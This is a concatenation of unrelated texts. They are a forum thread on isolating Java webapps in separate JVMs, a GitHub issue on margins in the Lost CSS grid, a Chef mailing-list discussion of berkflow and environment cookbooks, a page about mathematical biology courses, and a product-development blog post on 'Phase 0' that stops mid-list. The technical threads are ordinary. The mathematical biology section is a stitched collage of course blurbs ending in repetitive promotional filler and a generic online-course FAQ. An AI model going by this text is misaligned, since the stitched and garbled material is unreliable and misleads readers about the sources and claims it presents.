Running webapps in separate processes I'd like to run a web container where each webapp runs in its own process (JVM). Incoming requests get forwarded by a proxy webapp running on port 80 to individual webapps, each (webapp) running on its own port in its own JVM. This will solve three problems: Webapps using JNI (where the JNI code changes between restarts) cannot be restarted. There is no way to guarantee that the old webapp has been garbage-collected before loading the new webapp, so when the code invokes System.loadLibrary() the JVM throws: java.lang.UnsatisfiedLinkError: Native Library x already loaded in another classloader. Libraries leak memory every time a webapp is reloaded, eventually forcing a full server restart. Tomcat has made headway in addressing this problem but it will never be completely fixed. Faster restarts. The mechanism I'm proposing would allow near-instant webapp restarts. We no longer have to wait for the old webapp to finish unloading, which is the slowest part. I've posted a RFE here and here. I'd like to know what you think. Does any existing web container do this today? I'm closing this question because I seem to have run into a dead end: http://tomcat.10.n6.nabble.com/One-process-per-webapp-td2084881.html As a workaround, I'm manually launching a separate Jetty instance per webapp. Can't you just deploy one app per container and then use DNS entries and reverse proxies to do the exact same thing? I believe Weblogic has something like this in the form of managed domains. by providing a single management interface for multiple webapps you could enhance productivity that is not possible by using separate containers today. For example: when a user asks to reload a webapp, you could preload container-minus-webapp sitting idle in the background. When the reload requests come in you simply shut down the old JVM and load the new webapp into the waiting JVM. If I were to implement this today the act of shutting down an instance and relaunching it serially would take a lot longer (and thereby reduce development productivity). No, AFAIK, none of them do, probably because Java web containers emphasize following the servlet API - which spins off a thread per http request. What you want would be a fork at the JVM level - and that simply isn't a standard Java idiom. I am not asking each http request to run in its own JVM. I am isolating each webapp in its own JVM, not each request of the same webapp. If I understand correctly you are asking for the standard features for enterprise quality servers such IBM's WebSphere Network Deployment (disclaimer I work for IBM) where you can distribute applications across many JVMs, and those JVMs can in fact be distributed across many physical machines. I'm not sure that your fundamental premise is correct though. It's not necessary to restart a whole JVM in order to deploy a new version of an application. Many app servers will use a class-loader strategy that allows them to discard a version of an app and load a new one. You misunderstood my question. I don't not need a webapp to span JVMs. As far as I know there is no way safe way of restarting a JNI application short of restarting the entire JVM, so a special class-loader strategy will not work here.
STACK_EXCHANGE
Lost doesn't remove margin right From the documentation: Every element gets a float: left and margin-right: gutter applied to it except the last element in the row. Lost will automatically detect the last item in a row (based on the denominator you passed) and apply a margin-right: 0 to it by default. Yet with this simple css nav { lost-utility: clearfix; lost-column: 1/3; } div { lost-column: 2/3 0; } body { lost-utility: edit; } and this html: <!DOCTYPE html> <html> <head> <meta charset="utf8"> <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1"> <meta name="description" content="description of your site"> <meta name="author" content="author of the site"> <title>/index.html</title><link rel='stylesheet' href='css\test.css' /> </head> <body> <nav> <h3>Tyler Thrailkill</h3> <p>Don't look back</p><a href="/blog">blog</a><a href="/">home</a><a href="/tutorials">tutorials</a> </nav> <div class="posts"> <div class="post"></div> <h2><a href="\posts\test.html">Hello world</a></h2> <date>1/2/2015</date> <p>I talk about nothing</p> </div><script src='js\main.js'></script> </body> </html> my page looks like this: When I examine the css, it still has a margin-right of 30px on the 2/3 div. Shouldn't that be 0px? Yes, I'm currently figuring out a fix for this over here https://github.com/corysimmons/lost/issues/109 I looked over that thread before posting this one, but I wasn't sure if it was the same issue. What can I do to fix this for right now, if there even is a fix. I'm kinda new to a lot of this stuff. Don't even know what cycle is. You can manually add margin-right: 0 to that element. cycle basically sets nth-child(Xn) to margin-right: 0. I'll try to get this fixed tonight. Cool that worked. I'll keep it like this until you update the library. Thanks for the help! Library updated but now that I'm re-reading this issue, I don't think it's the same thing. I think your code might be a bit broken. Here's what I would do: <section> <nav>...</nav> <div class="posts">...</div> </section> section { lost-utility: clearfix; } nav { lost-column: 1/3; } .posts { lost-column: 2/3; } Ok, so I think maybe I'm misunderstanding how to use Lost properly. When I use the code you've posted (in other words putting the nav and div in a tag) the css works. As soon as I make nav and div direct children of it reverts to the margin on both tags. Lost operates using a lot of nth-child stuff, so when it's a direct child of <body> things like <script>, etc. get counted as children. By starting your code in some sort of wrapper (just not body) you fix this. Ah I understand. Great well that fixed my issue so far!
GITHUB_ARCHIVE
In the demonstration that Jamie Windsor did for berkflow at Chefcon he used a role/environment cookbook with multiple roles rather than single role I think in your case if you have a cookbook per role then the only way you can make it work that way is if cookbooks common to your role cookbooks all have the same version requirement (or no specific version requirement). I.e. if your lb cookbook needs nginx 1.2.3 but your web cookbook needs 1.2.4, and those versions are locked, then there’s not much you can do as you’ll have conflicting version locks in your environment. If you don’t have one role cookbook per role or you don’t have these specific version requirements then it’s pretty easy. You’d make a top level cookbook to wrap your role cookbooks which would be your environment cookbook (or if you have one role cookbook with multiple roles then this could be your environment cookbook) then just add the Berksfile.lock from the cookbook to source control, make sure it’s not in chefignore and that’s your one source of version locks which you can apply to all environments. You then add the recipes from the environment cookbooks to your nodes/roles. As there’s no actual logic in the environment cookbook whenever you want to update your environments you bump the metadata on the environment cookbook, run berks update and then upload it to your chef server. You can then use berkflow to apply the cookbook from your chef server to an environment, which will apply the locks only. You can now use your environments for whatever attributes you want. On Mon, Jun 22, 2015 at 10:43 PM, Torben Knerr email@example.com wrote: ah, interesting, was not aware of the fact that it would apply the cookbook locks to an existing environment while keeping the env attributes. That gets me some new thoughts. However, that would still mean I have one environment per node (or "role" at least), e.g.: “prod_lb”, “prod_web”, “prod_db” etc…, right? If so, that would also mean I have to duplicate the prod-specific attributes here (3x times in the example above), right? I realize I may could get around this using the YAML include approach Ranjib shared, which would keep it single-sourced, but still I’d need to update each of the “prod_*” environments from that single source. Last but not Ieast might have an impact on searches or environment checks as well, but that could be dealt with easily I guess, at least if it’s happening in your own recipes where you are in control of it. If there’s a better way to work with berksflow / berks apply while keeping the intuitive environment semantics, I’d be happy to learn more about it. On Mon, Jun 22, 2015 at 5:33 PM, Yoshi Spendiff < Not sure if you know, but the A/B choice you stated above aren’t actually mutually exclusive. If you want to use berkflow/berks apply to apply cookbook version locks to an environment that doesn’t stop you supplying normal environment variables to the environment. Berkflow/berks apply doesn’t change any attributes other than the version locks. On Sun, Jun 21, 2015 at 6:39 AM, Torben Knerr firstname.lastname@example.org wrote: I believe you first have to decide for what purpose you actually want to use Chef environments, and this decision then limits the options for technically implementing this. For me the key decision is: a) if you are going to use the berkflow / the environment cookbook berks apply environment, then this means you will end up with one environment per node b) if you are going to use environments for dev / test / staging / prod stages, you probably want to share environmental attributes across many Personally, I prefer b) and try to stick to the following principles: - use environments only for supplying environment specific data - don’t use environment for composing a node’s run list or other node - instead I use a single “top-level” wrapper cookbook per node, which - glues together the run list - sets attributes for configuring the wrapped cookbooks - sometimes adds addional glue code - locks the whole cookbook dependency graph via metadata.rb (so I can do it per node here and not need to use an environment for that) - defines the interface for the user (i.e. README, attributes, etc…) - the environments should contain only environment specific attribute overrides + the versions of the “top-level” cookbooks Since I’m wrapping other cookbooks and setting their attributes in (the "top-level" cookbook’s) recipe, I’m sometimes faced with the “computed attributes problem”. I tackle that by reloading the wrapped attributes file between setting the attributes and including the recipe, e.g. here: Also, my environments often share the same data, i.e. common attributes that are environmental data but still the same for many or even all of my environments. Ranjib recently posted a nice way on how to deal with that: Hope that helps or at least gives you some more ideas. There are many ways and even more opinions On Fri, Jun 19, 2015 at 4:22 PM, Douglas Garstang < If I was going to put move my environmental attributes into cookbooks… When deployed to an instance, the top level run list would need to include the environmental run list. That’s ok. However, when testing, this would mean that each cookbook would need to either include the environment cookbook (ie #include_recipe “env-dev”) and refer to it in the metadata.rb and Berksfile files, OR I’d have to specifically put each attribute into the Vagrantfile’s json data. This might work for simple cookbooks, but it would mean the cookbook is not being effectively tested. The attributes I’m testing against aren’t what really gets deployed to an instance. I also have to maintain two copies of the attributes and the worst case scenario is where the attribute is set in both places but the value in the Vagranrfile is incorrect and therefore leads to the incorrect assumption that the cookbook is working For my base cookbook it gets even worse. It would need to have every single attribute from every cookbook it includes put into the Vagrantfile’s json data. This just does not scale. It doesn’t seem like the benefits of gaining some revision control outweigh the maintenance disadvantages here. For all those that espouse the use of putting environment attributes into a cookbook how do you get around Mobile: +1 778 952 2025 Mobile: +1 778 952 2025
OPCFW_CODE
The Best Of Site About Good A COURSE IN MATHEMATICAL BIOLOGY Mathematical Biology - Department of Mathematics, Hong ... course is primarily for final year mathematics major and minor students. Other students are also welcome to enroll, but must have the necessary mathematical skills. My main emphasis is on mathematical modeling, with biology the sole applica-tion area. I assume that students have no knowledge of biology, but I hope that they MATHEMATICAL BIOLOGY. BIOLOGY 215. A first course applying mathematics to biological problems. Topics drawn from cell and molecular biology, molecular evolution, enzyme catalysis, biochemical pathways, ecology, systems biology, and developmental biology. Instructor: Mercer. Free Biology Tutorial - A mathematical way to think about ... A mathematical way to think about biology comes to life in this lavishly illustrated video book. After completing these videos, students will be better prepared to collaborate in physical sciences-biology research. These lessons demonstrate a physical sciences perspective: training intuition by deriving equations from graphical illustrations. Mathematical Biology Courses and Schools. Find out about courses that apply mathematics to biology to create models used in study and research. Get information on what you'll learn, how to choose a school and what careers you could pursue in this field. biomathematics, and mathematical modeling, and volumes of interest to a wide segment of the community of applied mathematicians, computational scientists, and engineers. Appropriate subject areas for future books in the series include fluids, dynamical systems and chaos, mathematical biology, neuroscience, mathematical Mathematical Representations of Cell Biological Systems I ... So how do mathematical representations help us solve biological problems. What mathematical representations do is to deal with complex systems in an orderly fashion. And in the case of cell biological and regulatory biology problems, allow us to predict IO or, or, or input output relationships as a function of time or space, or other variables. The mathematical biology concentration consists of 5.25 credits, an integrative project, and participation in a Math Biology Symposium. A student may petition to count a course other than the pre-approved electives toward his or her concentration if the student can show and the director concurs that the course includes an integrative component related to mathematical and/or computational biology. Math 113B: Intro to Mathematical Modeling in Biology :: UC ... Math 113B: Intro to Mathematical Modeling in Biology (English) Course Information This course is intended for both mathematics and biology undergrads with a basic mathematics background, and consists of an introduction to modeling biological problems using continuous ODE methods (rather than discrete methods as used in 113A). Mathematical Modelling in Systems Biology: An Introduction to be extended to mechanistic mathematical models. These models serve as working hypotheses: they help us to understand and predict the behaviour of complex systems. The application of mathematical modelling to molecular cell biology is not a new endeavour; there is a long history of mathematical descriptions of biochemical and genetic networks. This graduate course, taught May 1-31, 2012, was partially sponsored by the PIMS International Graduate Training Center (IGTC) in Math-Biology, and by independent funding held by Leah Keshet. Large parts of this course are available online at the course Home Page, where relevant biological topics and mathematical background needed to understand ... Mathematical Biology BSc (Hons) | University of Dundee We have a strong reputation for research in Life Sciences and for the Mathematical Biology Research Group. You will be taught by leading research active academics. You will also be able to join DUMaS (Dundee University Maths Society), an active society open to all students studying mathematics or mathematical biology. This is a combined textbook review and course plan for a biomathematics model-ing course that is taught at the author’s home institution as a foundation course in the Biomathematics Master’s Program. The pros and cons of using Linda J.S. Allen’s textbook, An Introduction to Mathematical Biology, for a one-semester course is discussed. · In addition, mathematical skills essential for biologists are covered thoroughly as part of this course, including levels of measurements, permutations and combinations, tests for categorical data including Relative Risk, Odds Ratio and so on. Fun facts and games included in the course is expected to pique interest among the participants. Mathematical Biology | School of Mathematical and ... Our areas of expertise. Differential equations, dynamical systems, probability and their applications to modeling in fields such as neuroscience, epidemiology, population biology and ecology, systems biology, soft matter (lipids, proteins) at interfaces, and cancer. Mathematical Biology - my.UQ - University of Queensland Please Note: Course profiles marked as not available may still be in development. Course description. Mathematical modelling of biological systems, with a particular focus on neuroscience and cell biology. Mathematical Modeling in Biology | University of Michigan ... Mathematical biology is a fast growing and exciting modern application of mathematics that has gained worldwide recognition. In this course, mathematical models that suggest possible mechanisms that may underlie specific biological processes are developed and analyzed. For every 30 minutes, you study, take a short 10-15 minute break to recharge. Make studying less overwhelming by condensing notes from class. Underline or highlight keywords. Create visual aids like charts, story webs, mind maps, or outlines to organize and simplify information and help you remember better. Are online classes easy? Online classes are no easier than classes offered in the traditional classroom setting and in some cases can be even be more difficult. There are several reasons for this. Online courses require more self-motivation. It can be hard for some students to stay motivated when they'd rather be doing something else. Are online courses free? We offer a massive number of online courses, most of them are free. You can find the free courses in many fields through Coursef.com Are online courses legit? Yes, they are legitimate - some of the time - but you have to be sure that you've done your research because typically online universities a course in mathematical biology provides a comprehensive and comprehensive pathway for students to see progress after the end of each module. With a team of extremely dedicated and quality lecturers, a course in mathematical biology will not only be a place to share knowledge but also to help students get inspired to explore and discover many creative ideas from themselves. Clear and detailed training methods for each lesson will ensure that students can acquire and apply knowledge into practice easily. The teaching tools of a course in mathematical biology are guaranteed to be the most complete and intuitive.
OPCFW_CODE
from abc import ABC, abstractmethod from kernel.output import Output, OutputResult class AbstractModule(ABC): def __init__(self): # Sibling module chain, where submodules are located self.module_chain = None # Current module chain, where module is located self.current_module_chain = None # Parent module chain self.parent_module_chain = None self.filter_files = False self.collect_data = False self.extract_data = False self.args = None self.title = None # Initial value is none, can be filled during execution self.files = [] # Data collected from files self.data = {} # Extract options self.extract = {} @abstractmethod def check(self): pass @abstractmethod def check_arguments(self): pass # Gives information if module filtering files or not def is_filter_files(self) -> bool: return False # Gives information if module collecting data from analyzed files def is_collect_data(self) -> bool: return False # Does module have extract options def is_extract_data(self) -> bool: return False def description(self) -> str: return "" def do_filter_files(self): pass def do_collect_data(self): pass def do_extract_data(self): pass def execute(self): Output.do("Executing module: \"%s\"" % self.__class__.__module__.replace("modules.", "", 1)) try: if self.is_filter_files(): self.do_filter_files() Output.ok("Files: %d" % len(self.files)) if self.is_collect_data(): self.do_collect_data() if self.is_extract_data(): self.do_extract_data() except PermissionError as e: Output.fail("Permission error. Could not read file \"%s\"" % e.filename)
STACK_EDU
M: Ask HN: What can you build with iPhone X? - zaroth Does anyone look at iPhone X and say? "Wow, now I can finally build an app which does _____!" R: arjunvpaul A blind interview application to avoid bias. With a combination of Face Tracking and Voice Modulation (see: [https://www.voicemod.net](https://www.voicemod.net)), one could now have a Interviewer avatar interviewing an Interviewee avatar. R: arjunvpaul An application that could SIGNIFICANTLY reduce returns for online clothing retailers. About 70% of garment returns are because the clothes didn't fit as the customer expected or hoped (Source: [https://goo.gl/djcgUx](https://goo.gl/djcgUx)) The iphoneX basically has a Kinect stuffed into it now. One could now take a high quality 3D image of themselves, store it on their profile and be shown ONLY clothes, shoes, sunglasses, gloves etc that fit them while shopping online. Now, before you say fit is not al about having a nice 3D image. For a retailer like Asos (www.asos.com), a 1 percent fall in returns would immediately add 10 million pounds ($16 million) to the company's bottom line. (Source: Quote from ASOS CEO Nick Robertson). How about em apples? R: arjunvpaul Aren't you curious to see how ridiculous you could look asking "Are you not entertained?!" in a Roman colosseum? How about a fun app that lets you take famous clips from Movies and overlay your face on it. Kinda like Face Swap for video.
HACKER_NEWS
That said, the encoder familiar construct the line has a much bigger difference on the standard. I used to make use of 256k AAC my Shuffle and gorge cringeworthy excessive currency, and drums slightly tracks. Then switching over to MP3 NORMALIZER at 220k a lot of the simplicity is gby the side ofe and can barely discover a difference between that and three20k Free Convert MP3 To WAV If i have an MP3 file how can i convert it to a WAV pilaster? (ideally, utilizing a pure python method) python mp3-improve this query editedJun 15 '10 at 22:fourfouraskedJun 15 '1zero at 22:36 yydl 13.fourk 104seventy eighteight CD to MP3 Converter - convert MP3 to WAV I knew this app once I was looking for an app to obtain MP3 merely. audacity helped me rather a lot. It additionally gave me an concept to obtain video on-line with this sort of software.As I said beforehand, i actually want to have a meal a complete software which may help me download MP3 and MP4. unfortunately, solely vGuruSoft Video obtainer for Mac permits me to do that.http://www.macvideodevice.com/vgurusoft-video-obtainer-mac.html Youtube Downloader & Youtube to MP3 converter. Do you take heed to music sites apart from YouTube? Not solely are you able to obtain YouTube videos on Flvto.biz, but for the primary ever, you'll be able to convert music from a lot of various video-internet hosting sites including Vimeo, Dailymoti, Metacafe, fb, and more! merely paste the URL from any web site, and cvert your video to amp3 hq . mp3gain is a spinster and make a start source Audio Editor which allows you to convert ogg to mp3, convert mp3 to ogg, convert vinyls to mp3 or ogg, hoedown any kind of residence recording, take away kick, and so forth. Is click here . i have used it to record and blend a few of my bands songs. be happy to test outthis pageto download some songs. As an amatuer I choose FLAC, its simpler to take heed to next to -finish clatter methods, dins better by the side of high-finish units and you can do your appropriate cby the side ofversiby the side ofs to your smaller MP3s in your smaller devices house is not so much a difficulty these daysPersnext tocolleague I enjoy listening to FLACs because it makes these low-cost audio system din that a small amount of bit higher, and as for those excessive finish units, and as for those excessive-end devices, you do notice the difference, buy your self a cheap oscilloscope and have a look at the difference your self, your ears might only have the ability to hear a select range of frequencies but the definition of the tbyes you hear are one thing else, you'll discover an improvement after a while of listening to higher quality audio information, and as for these guys with high end automobile stereos who want to gain the most out of their music, listening to their beats as roaring as they will, try comparing the distinction between the qualities after compressing your audio for extra boomingness, shindiges make a difference
OPCFW_CODE
using an external library: C versus C++ issue I downloaded a vendor's library for accessing analog I/O (http://www.rtd.com/software/CM/aAIO/aAIO_Linux_V02.00.00.tar.gz) on their motherboard (http://www.rtd.com/PC104/CM/CMX32/CMX32MVD.htm) and it works fine. I can compile the driver, install the driver, compile the library, compile the example usage code and run the example usage code that uses the library. It works like a charm. All the compiles use the command line "make" command. My problem is that I can't figure out how to get this exact same example code to compile in my catkin workspace and then add ROS code into it so I can publish the analog readings as ROS topics. (Actually the link to the tarball above is old and the vendor emailed me a new version that is not on their website yet. Let me know if you would like me to get that corrected tarball to you.) The example code I want to start with is "soft_trig.c" from the examples folder. I can copy that file into my catkin package, add it to the CMakeLists.txt, get it to compile as straight C code linked to the library without any ROS calls, and even execute it using rosrun just fine. Here is my working CMakeLists.txt: cmake_minimum_required(VERSION 2.8.3) project(ros_aaio_node) find_package(catkin REQUIRED COMPONENTS roscpp rospy std_msgs ) catkin_package( ) include_directories( ~/aaio/include ${catkin_INCLUDE_DIRS} ) link_directories(~/aaio/lib) add_executable(ros_aaio_node src/soft_trig.c) target_link_libraries(ros_aaio_node rtd-aaio ${catkin_LIBRARIES} ) So now I want to add ROS stuff to the file so I can publish data as ROS Topics. This is where I don't know what to do. I added #include <ros/ros.h> to the file and I got lots of compile errors. Lots of header files were not found. It occurred to me that all my other ROS code was cpp files, not c files, so I renamed the file to soft_trig.cpp and changed the executable line in the CMakeLists.txt file too and I get a lot of different compile errors now. Tons of deprecated conversion warnings and several invalid conversion errors. I saw some working code on another project where a coworker had been using a straight C compiled library with their ROS code and they used these two lines in their CMakeLists.txt: set(CMAKE_C_FLAGS "-std=c99" ) set(CMAKE_CXX_FLAGS "-fpermissive") So I tried that and all the compiler warnings and errors went away. But now I get a whole slew of undefined reference errors during linking. Linking CXX executable ~/catkin_ws/devel/lib/ros_aaio_node/ros_aaio_node CMakeFiles/ros_aaio_node.dir/src/soft_trig.cpp.o: In function `main': soft_trig.cpp:(.text+0x851): undefined reference to `aAIO_Open(aAIO_Descriptor**, unsigned char)' soft_trig.cpp:(.text+0x873): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0x8a0): undefined reference to `aAIO_Reset(aAIO_Descriptor*)' soft_trig.cpp:(.text+0x8c2): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0x934): undefined reference to `aAIO_Install_ISR(aAIO_Descriptor*, void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), int, int)' soft_trig.cpp:(.text+0x956): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0x99c): undefined reference to `aAIO_Interrupt_Enable(aAIO_Descriptor*, aaio_channel, aaio_interrupt)' soft_trig.cpp:(.text+0x9be): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xa7f): undefined reference to `aAIO_Write_CGT_Entry(aAIO_Descriptor*, aaio_cgt)' soft_trig.cpp:(.text+0xaa1): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xae2): undefined reference to `aAIO_Software_Trigger(aAIO_Descriptor*)' soft_trig.cpp:(.text+0xb04): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xb3e): undefined reference to `aAIO_Read_Result(aAIO_Descriptor*, aaio_channel, int*)' soft_trig.cpp:(.text+0xb60): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xc50): undefined reference to `aAIO_Remove_ISR(aAIO_Descriptor*)' soft_trig.cpp:(.text+0xc72): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xc9f): undefined reference to `aAIO_Reset(aAIO_Descriptor*)' soft_trig.cpp:(.text+0xcc1): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xcee): undefined reference to `aAIO_Close(aAIO_Descriptor*)' soft_trig.cpp:(.text+0xd10): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' collect2: error: ld returned 1 exit status These are all the calls to the C compiled library that the example file was just linking to and using just fine when the filename was soft_trig.c. Now that the filename is soft_trig.cpp, I get these linker errors. I can't seem to win. What am I doing wrong? How can I use this existing example C code and turn it into ROS code? Originally posted by Kurt Leucht on ROS Answers with karma: 486 on 2016-02-19 Post score: 0 There are (at least) two issues here (both of which are - strictly speaking - actually not very ROS specific): compiling C code with a C++ compiler C++ name mangling re 1): as you discovered, renaming a file with C code doesn't necessarily make it (valid) C++, hence the need for the compiler flags. Warnings like deprecated conversion are exactly what one would expect. re 2): linking probably fails because C++ mangles names. Linker is looking for ?Fi_i@@YAHH@Z, mfg library exports int Fi_i(int bar). Compiling C as C++ is most likely the cause. Suggestion: treat the library you got from the mfg as just another system dependency. Use the normal make, (sudo) make install procedure to install the mfg lib and headers into /usr/local (or wherever it installs), like you already did before you "add(ed) ROS stuff". Then either - as you do now - hard-code the location of the headers and library in your CMakeLists.txt (not recommended), or write a minimal FindAAIO.cmake (or whatever you name it) that searches for the library and headers at CMake configuration time (highly recommended). Up to here everything is actually non ROS-specific: this is a normal CMake workflow. For your ROS node(s), just #include <..> the necessary headers from the mfg library into your C++ sources, but make sure they already do something like: #ifdef __cplusplus extern "C" { #endif ... #ifdef __cplusplus } #endif This basically tells a C++ compiler to not mangle the names for any symbols declared inside those guards. I'd be surprised if the mfg library's headers don't already do this, but do check. This avoids the linker errors you encountered earlier. Ideally your ROS node(s) would now be just a 'thin wrapper' around some AAIO library functions. Originally posted by gvdhoorn with karma: 86574 on 2016-02-20 Post score: 3 Comment by Kurt Leucht on 2016-02-22: Thanks! Adding the extern "C" wrapper to all the vendor's header files appears to have worked! Comment by gvdhoorn on 2016-02-23: Alternatively you could extern "C" your #include <> statements (so in your own sources). That way you don't have to change the vendor files. Comment by Kurt Leucht on 2016-02-23: That's even better! Thanks!
STACK_EXCHANGE
Parents tracks aren't available I'm testing some GRCh38 stuff using these links: https://iobio.s3.amazonaws.com/samples/bam/NA12878.GRCh38.bam https://iobio.s3.amazonaws.com/samples/bam/NA12891.GRCh38.bam https://iobio.s3.amazonaws.com/samples/bam/NA12892.GRCh38.bam https://iobio.s3.amazonaws.com/samples/vcf/platinum-exome.GRCh38.vcf.gz And I put in gene F5. Proband track appears, but if I go on the Other Tracks dropdown, the only option is ClinVar. Why are the parents tracks not visible? Actually, even if you try entering the demo URL's in GRCH37, the mother and father tracks are not available. https://s3.amazonaws.com/iobio/samples/bam/NA12878.exome.bam https://s3.amazonaws.com/iobio/samples/bam/NA12892.exome.bam https://s3.amazonaws.com/iobio/samples/bam/NA12891.exome.bam https://s3.amazonaws.com/iobio/samples/vcf/platinum-exome.vcf.gz The flags that are used to show these tracks are not being set. I will get a fix for this.. @AlistairNWard This is ready for testing on stage.gene Remind me (and add to the deployment plan wiki page) whether I test on dev.gene or stage.gene. I keep forgetting! You test on stage.gene. Pull request linked to this issue was reviewed and merged on to the dev branch. With that, the staging version gets updated. However, If a developer wants quick feedback on an issue he can update the dev version ask you to test on dev.gene.. Why do we not see the coverage in the parents tracks? This is also important information, and I'm sure we used to see that. I tested on stage.gene and got this? This is (almost) correct. When there are no variants present, having a specific message stating that there are no variants makes it clear that the empty track isn't a bug. That said - why do we see the message twice for the proband? Alistair Ward, PhD Co-founder | President | COO Frameshift Genomics Inc. Director, Research and Science Eccles Institute of Human Genetics University of Utah School of Medicine On Wed, Nov 25, 2020 at 4:16 PM Matt Velinder<EMAIL_ADDRESS>wrote: I tested on stage.gene and got this? [image: image] https://user-images.githubusercontent.com/22081541/100282381-b8c44580-2f28-11eb-9671-b369feb879d6.png — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/iobio/gene.iobio.vue/issues/653#issuecomment-733949215, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAD7WZZYTKV2KTH7PMF4YJLSRVXZTANCNFSM4TFJJWQQ . I have fixed the message"No variants are present in proband" from appearing twice. You can try it on stage.gene Looks good to me
GITHUB_ARCHIVE
Rekey impossible http://prntscr.com/jt9ujq Impossible to rekey this folder. (already have a new paper key) @InTheFlipside maybe you lost/revoked all your previous devices and now there are no devices that can rekey it. We can reset it for you if you want. If you want us to reset your folder, please run this command on a currently-valid keybase device, and substitute the current date and time where indicated: keybase sign -m "<DATE_AND_TIME>: Please reset folder /keybase/private/filpside because all the devices that have access have been revoked." and post the results here. BEGIN KEYBASE SALTPACK SIGNED MESSAGE. kXR7VktZdyH7rvq v5weRa0zkMT1xSL jysgVXKg6MRmLZU DyNxPFa3WI8afXe OyVo3Vdiy3MXe5F Z2irofYi6EQQssR 4eyywGdg3temtHj IczAyGtXeLDBCvd fPi15WUKuSafsUK DfGQysAke78NJzc vUhgmteFRUqO1VU lU4QNsijGneFcv1 WkuazFymfFVaOCb XysMhwwEDnwZGZE qLjbEPheJ7z3VR0 xuI7sWfjXQJOIDn adTDeAYEX1XyLcH wSEN6mvldOu0x3s IEUa4oBy89aTILo 7mStmuDEWr1H0cq MOzQeKGi6ahq0NF L2o193Xn0VhE4nd Xnsmxi9scmClEW9 ovbAherEAI. END KEYBASE SALTPACK SIGNED MESSAGE. Sended, thank :) @InTheFlipside I looked into this a little and saw that your folder is still keyed for your device SourceCode, which hasn't yet been revoked. Assuming that device is still online somewhere, I think the probably is likely a bug that is preventing your rekey. (I could tell for sure if you do a keybase log send from SourceCode and post the resulting log ID here.) Depending on your operating system, you could try upgrading, though the bug fix isn't released on all platforms yet. If it hasn't been released yet, you might be able to use an experimental build instead of waiting for the next release on your platform. If you'd rather I just reset your folder anyway, that's fine too, just confirm that you want that. I just like avoiding resets if possible. @strib Thanks for your answer SourceCode is deleted. (It was my previous windows). I revoked it. (sended keybase log send, before and after) Can you reset this folder please? I gave up a little bit to find a solution ( i doubt that it contain important files. I don't remember but it doesn't have importance) thank a lot ! I reset the folder. Please check it out and close this if everything seems ok. (Might require a Keybase restart.) everything is okay thanks :)
GITHUB_ARCHIVE
“How should we get started?” is a question we got used to listening to. “Let’s find out together!” is the answer we got used to answering. There’s no magic recipe in Product Development. Each business strives in different circumstances, and quality is about making the best out of each context. That’s why, when potential clients knock on Pixelmatters’ door and want to start fast, they hear many questions from us first. Without understanding the business and the current Product, going fast will lead to a dead-end street. For a product to succeed, we should play for the long run by starting small and iterating quickly. That’s why Phase 0 is essential. What happens in Phase 0? From a few days to a couple of months, it will role out a bit like a Sherlock Holmes movie. There’s a mystery to solve — where should we start here? To determine what should be worked on first, we begin by assigning a smaller cross-functional team consisting of a Product Owner, a Designer, and an Engineer - probably constituted by senior people across the company - that may or may not be a part of the team later on. Depending on the context, this smaller cross-functional team constitution may vary, and we may have other senior roles involved for a short period of time. The rest of the team joins later once there’s a defined path for what’s ahead in the coming weeks/months — for example, the remaining Engineers that were not a part of Phase 0. In parallel to determining priorities with this team, we kick off another part of Phase 0 — clarifying the path and building alignment with the client. The rest of the team that will build the Product - isn’t involved at this point because of efficiency - the goal is to onboard them once the plan is clearer. After all, Sherlock Holmes only has Watson by his side the entire time for a reason - too many people would only slow him down in such an exploratory phase. As the purpose of Phase 0 is to build alignment on what can be a potential MVP or initial iteration, the first step is to understand the following: - The business model; - The current Product (if any); - Previous work done on top of the Product; - The main goals for the first months of the collaboration (and why those are the priority). At this stage, the Product Owner often leads the efforts in close collaboration with peers from Design and Engineering as they’re still identifying the main opportunities and planning the initial requirements. It’s also a period of divergence where multiple ideas and alternatives are discussed. After all, this is a collaboration, and clients expect to hear our advice on how to move forward! 🚀 Once there is a high-level understanding of the business, the Product, and the main goals are identified, it’s time to get our hands dirty and start converging. From First Conversations to Groundwork This is where Design and Engineering take over, collaborating with each other and with the Product as we dig deeper into what’s needed before the rest of the team that will be a part of the project joins. The work we do here can take many shapes and forms depending on what comes out of the first conversations - the most common scenarios are: - The client knows the direction and the potential solutions, and Phase 0 is used to craft a couple of ways to get there; - The client doesn’t know the direction or potential solutions but knows the problem at hand and needs our help during Phase 0. We might adapt the depth and focus of our work depending on the scenario, but our necessity to understand the user needs from a technological standpoint doesn’t change. A few exercises we can conduct on the Design side: - Personas - Build the user personas by analyzing internal documentation provided by the client or by interviewing customers. - Customer Journeys - Craft the most helpful customer journey, considering the initial features we’ll work on. - Crazy 8s - Once the client identifies a problem, the team gathers around and starts brainstorming potential solutions to solve it - the primary outcomes are discussed with the client, and one idea can serve as the starting point to get things going. - Wireframes - If there’s a specific flow in mind, this is also a good time to draft a set of wireframes to materialize some thoughts. On the Engineering side, the focus relies mainly on making the first critical decisions to get things going: - Code Analysis - If there’s a current product in place, we conduct a thorough audit to identify any immediate changes and know the foundations on which we’ll start building the code. - Architecture & Infrastructure - If not yet in place, decisions related to the Product’s architecture & infrastructure are essential to start with. This gives the rest of the Engineering crew a common understanding of the guidelines everyone should follow to ensure the Product’s scalability, consistency, and good practices. - Tech Stack proposal - 